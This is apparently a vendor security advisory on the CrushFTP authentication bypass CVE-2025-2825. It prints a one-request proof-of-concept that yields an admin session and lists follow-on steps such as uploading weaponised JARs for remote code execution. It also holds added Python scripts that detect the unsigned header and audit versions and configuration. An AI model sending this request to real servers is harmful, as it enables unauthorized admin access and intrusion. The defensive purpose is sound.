
Exploited! CrushFTP Authentication-Bypass Vulnerability (CVE-2025-2825)

Amit Sheps, Director of Product Marketing
April 23, 2025

CrushFTP, a Java-based, multi-protocol file-transfer server, ships with an Amazon S3-compatible API. A logic error in the method loginCheckHeaderAuth() (ServerSessionHTTP.java) misuses the Boolean flag lookup_user_pass: when the flag is true the server is supposed to look up a stored password, yet a later branch interprets the same flag as "accept any password."
An attacker can therefore send a single request carrying an Authorization: AWS4-HMAC-SHA256 Credential=<user>/ header with no signature; the vulnerable code path sets anyPass=true, skips every subsequent check, and returns a valid admin session cookie. Versions 10.0.0 – 10.8.3 and 11.0.0 – 11.3.0 are affected. The flaw was first published as CVE-2025-2825 and re-catalogued as CVE-2025-31161; exploitability is unchanged under either identifier.

Exploit Methods

Below is a one-packet proof-of-concept that turns any unauthenticated visitor into the built-in crushadmin super-user:

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: victim.example.com:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Walk-through

  1. Credential=crushadmin/ extracts the username.
  2. No tilde (~) appears, so lookup_user_pass stays true.
  3. Deeper in the call stack the same flag flips to anyPass=true, bypassing verify_user().
  4. A timestamp-token cookie that merely looks like CrushAuth=<13-digit>_<30-chars> is accepted without validation.
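
The four steps above describe what the server does with the header; the mirror image for a defender is a check that flags such requests in captured traffic or proxy logs. The script below is an added example, not code from the write-up or from CrushFTP: it parses raw HTTP/1.1 requests (the three samples are constructed, and the host name is invented), treats an AWS4-HMAC-SHA256 Authorization header that carries a Credential but no Signature field or scope as the CVE-2025-2825 pattern, and notes whether a CrushAuth cookie of the shape the write-up describes accompanied it. A properly signed S3-style request and an ordinary Basic-auth login produce no finding.

```python
import re

# Constructed sample requests (not from any real capture). The first mimics the
# unsigned header pattern the write-up describes; the other two are benign shapes.
SAMPLE_REQUESTS = [
    "GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1\r\n"
    "Host: ftp.example.internal:8081\r\n"
    "Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111\r\n"
    "Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/\r\n"
    "\r\n",
    # Signed SigV4 request: Credential carries the full scope and a Signature is present.
    "GET /bucket/object HTTP/1.1\r\n"
    "Host: ftp.example.internal:8081\r\n"
    "Authorization: AWS4-HMAC-SHA256 Credential=alice/20250423/us-east-1/s3/aws4_request, "
    "SignedHeaders=host;x-amz-date, Signature=0123456789abcdef\r\n"
    "\r\n",
    # Ordinary web-interface login: no S3-style header at all.
    "POST /WebInterface/function/ HTTP/1.1\r\n"
    "Host: ftp.example.internal:8081\r\n"
    "Authorization: Basic Ym9iOnNlY3JldA==\r\n"
    "\r\n",
]

# Shape of the session cookie the write-up says is accepted without validation.
CRUSHAUTH_RE = re.compile(r"CrushAuth=\d{13}_[A-Za-z0-9]{30}")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_sigv4(value):
    """Return the key=value fields of an AWS4-HMAC-SHA256 Authorization header, or None."""
    scheme, _, rest = value.partition(" ")
    if scheme != "AWS4-HMAC-SHA256":
        return None
    fields = {}
    for part in rest.split(","):
        key, sep, val = part.strip().partition("=")
        if sep:
            fields[key] = val
    return fields


def assess_request(raw):
    """Return a finding for a request matching the CVE-2025-2825 header pattern, else None."""
    request_line, headers = parse_request(raw)
    fields = parse_sigv4(headers.get("authorization", ""))
    if fields is None:
        return None
    credential = fields.get("Credential", "")
    user = credential.split("/", 1)[0]
    reasons = []
    if "Signature" not in fields:
        reasons.append("AWS4 header carries no Signature field")
    if credential.endswith("/") or "/" not in credential:
        reasons.append("Credential names a user but no scope")
    if not reasons:
        return None  # properly signed S3-style request, nothing to report
    return {
        "request": request_line,
        "user": user,
        "session_cookie": bool(CRUSHAUTH_RE.search(headers.get("cookie", ""))),
        "reasons": reasons,
    }


def scan_requests(requests):
    """Run the check over a batch of raw requests and keep only the findings."""
    return [f for f in (assess_request(r) for r in requests) if f]


if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

The cookie is reported as context rather than used as the trigger, because the same CrushAuth shape is what a legitimate session carries; the unsigned AWS4 header is the part that has no benign explanation on a CrushFTP host.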

With this cookie the attacker may:

  • Invoke admin API calls such as putUser, getServerStatus, or writeFile.
  • Upload weaponised JARs to ${CrushFTP_HOME}/plugins/ and gain remote code execution.
  • Trigger scheduled jobs that execute arbitrary shell commands.

Potential Risk

  • Data theft – Steal confidential archives, source code, and database backups.
  • Data tampering – Replace installers or backups, poisoning supply chains or sabotaging recovery plans.
  • Ransomware deployment – Encrypt repositories and demand payment.
  • Lateral movement – Pivot from the CrushFTP host into flat internal networks.
  • Regulatory exposure – Immediate non-compliance with GDPR, HIPAA, PCI, and similar mandates.

Mitigation

  • Upgrade immediately
    • 10.x → 10.8.4 or newer
    • 11.x → 11.3.1 or newer (download via the official wiki).
  • Network isolation
    • Place CrushFTP behind its DMZ proxy; expose only the proxy to the internet.
    • Restrict administrative ports to trusted IP addresses.
  • Disable unused S3 mode
    • Preferences → WebInterface → Disable AWS S3–style authentication.
  • Credential hygiene
    • Rotate all admin passwords; remove unknown accounts from users/MainUsers/.
  • Threat-hunt for compromise indicators
    • Log entries containing anyPass=true.
    • Files such as /tmp/mesch.exe, rogue JARs under plugins/, or newly scheduled tasks.
  • Apply the hardening flag (added in v11.3.1):
    <!-- serverprefs.xml -->
    <property name="s3_auth_lookup_password_supported">false</property>
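
To turn the affected-version ranges given earlier and the hardening flag above into a repeatable check, the following audit script is an added example, not IONIX's or CrushFTP's own code. It extracts a MAJOR.MINOR.PATCH triple from a version string or banner, tests it against the two inclusive ranges from the advisory, and, for releases at or above 11.3.1 (the version the write-up says introduced the flag; that the flag exists only from that release is an assumption), reads serverprefs.xml and reports the flag when it is absent or not set to false. The <serverprefs> wrapper element in the constructed XML fragments is an assumption; only the <property> line comes from the page.

```python
import re
import xml.etree.ElementTree as ET

# Affected ranges from the advisory, inclusive: 10.0.0-10.8.3 and 11.0.0-11.3.0.
AFFECTED_RANGES = [((10, 0, 0), (10, 8, 3)), ((11, 0, 0), (11, 3, 0))]
# Property name exactly as it appears in the serverprefs.xml line quoted in the write-up.
HARDENING_FLAG = "s3_auth_lookup_password_supported"
# Assumption: the flag is only meaningful from the release that introduced it, 11.3.1.
FLAG_INTRODUCED = (11, 3, 1)


def parse_version(text):
    """Extract the first MAJOR.MINOR.PATCH triple from a version or banner string."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected_version(text):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(text)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def read_hardening_flag(prefs_xml):
    """Return the flag's value from a serverprefs.xml document, or None if it is absent."""
    root = ET.fromstring(prefs_xml)
    for prop in root.iter("property"):
        if prop.get("name") == HARDENING_FLAG:
            return (prop.text or "").strip().lower()
    return None


def audit(version_text, prefs_xml):
    """Return (code, message) findings for a host's version and serverprefs.xml contents."""
    findings = []
    v = parse_version(version_text)
    if is_affected_version(version_text):
        findings.append(("vulnerable-version",
                         "CrushFTP %s is in an affected range; upgrade to 10.8.4+ or 11.3.1+"
                         % ".".join(map(str, v))))
    if v >= FLAG_INTRODUCED:
        flag = read_hardening_flag(prefs_xml)
        if flag != "false":
            shown = "unset" if flag is None else repr(flag)
            findings.append(("s3-lookup-flag",
                             "%s is %s; set it to false" % (HARDENING_FLAG, shown)))
    return findings


# Constructed serverprefs.xml fragments: the <serverprefs> wrapper and the
# max_users property are invented; only the hardening <property> line is from the page.
HARDENED_PREFS = (
    '<serverprefs><property name="s3_auth_lookup_password_supported">false</property>'
    "</serverprefs>"
)
UNHARDENED_PREFS = '<serverprefs><property name="max_users">100</property></serverprefs>'

if __name__ == "__main__":
    for version, prefs in [("CrushFTP 11.3.0", UNHARDENED_PREFS),
                           ("11.3.1", UNHARDENED_PREFS),
                           ("11.3.1", HARDENED_PREFS),
                           ("10.8.4", UNHARDENED_PREFS)]:
        print(version, audit(version, prefs) or "no findings")
```

A host still inside an affected range gets only the version finding, since the flag did not exist there and the upgrade is the fix; the flag check adds value once the patched release is in place and the S3-style login is still enabled.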

Does CVE-2025-2825 impact me?

IONIX is actively tracking this vulnerability. Our research team has built a full exploit-simulation model that tests every discoverable CrushFTP endpoint—internal or external—against the known bypass. IONIX customers can view real-time, asset-level exposure details in the Threat Center of the IONIX portal.
